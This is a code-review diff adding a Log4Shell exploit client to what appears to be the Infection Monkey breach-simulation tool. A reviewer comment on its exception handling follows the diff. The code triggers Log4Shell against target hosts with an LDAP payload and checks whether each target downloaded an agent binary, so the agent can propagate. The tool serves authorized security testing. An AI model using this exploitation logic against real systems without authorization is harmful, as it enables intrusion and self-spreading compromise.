monkey/agent_plugins/exploiters/log4shell/src/log4shell_exploit_client.py

```diff
@@ -0,0 +1,216 @@
+import logging
+from time import time
+from typing import Tuple
+
+from egg_timer import EggTimer
+
+from common.agent_events import ExploitationEvent, PropagationEvent
+from common.event_queue import IAgentEventPublisher
+from common.tags import (
+    BRUTE_FORCE_T1110_TAG,
+    EXPLOITATION_FOR_CLIENT_EXECUTION_T1203_TAG,
+    INGRESS_TOOL_TRANSFER_T1105_TAG,
+)
+from common.types import AgentID, Event, NetworkPort
+from infection_monkey.i_puppet import TargetHost
+from infection_monkey.network.tools import get_interface_to_target
+
+from .log4shell_options import Log4ShellOptions
+from .log4shell_utils import get_log4shell_service_exploiters
+
+logger = logging.getLogger(__name__)
+
+LOG4SHELL_EXPLOITER_TAG = "log4shell-exploiter"
+EXPLOITER_TAGS = (
+    LOG4SHELL_EXPLOITER_TAG,
+    BRUTE_FORCE_T1110_TAG,
+    EXPLOITATION_FOR_CLIENT_EXECUTION_T1203_TAG,
+)
+PROPAGATION_TAGS = (
+    LOG4SHELL_EXPLOITER_TAG,
+    EXPLOITATION_FOR_CLIENT_EXECUTION_T1203_TAG,
+    INGRESS_TOOL_TRANSFER_T1105_TAG,
+)
+
+VICTIM_WAIT_SLEEP_TIME_SEC = 0.050
+
+
+class Log4ShellExploitClient:
+    def __init__(
+        self, exploiter_name: str, agent_id: AgentID, agent_event_publisher: IAgentEventPublisher
+    ):
+        self._exploiter_name = exploiter_name
+        self._agent_id = agent_id
+        self._agent_event_publisher = agent_event_publisher
+
+    def exploit(
+        self,
+        target_host: TargetHost,
+        options: Log4ShellOptions,
+        ldap_port: NetworkPort,
+        agent_binary_downloaded: Event,
+        exploit_class_downloaded: Event,
+        service_port: NetworkPort,
+        interrupt: Event,
+    ) -> Tuple[bool, bool]:
+        exploitation_success = False
+        propagation_success = False
+        try:
+            for service_exploiter in get_log4shell_service_exploiters():
+                logger.debug(
+                    f'Attempting Log4Shell exploit for service "{service_exploiter.service_name}"'
+                    f"on port {service_port}"
+                )
+                timestamp = time()
+                service_exploiter.trigger_exploit(
+                    Log4ShellExploitClient._build_ldap_payload(target_host, ldap_port),
+                    target_host,
+                    service_port,
+                )
+                exploitation_success, propagation_success = self._assess_exploit_status(
+                    target_host,
+                    options,
+                    agent_binary_downloaded,
+                    exploit_class_downloaded,
+                    timestamp,
+                    interrupt,
+                )
+                if exploitation_success or propagation_success:
+                    break
+        except Exception:
+            logger.exception("An exception was encountered while attempting to exploit Log4Shell")
```

Comment:
By this logic, if one of the service exploiters throws an exception, none of the ones after that will be attempted.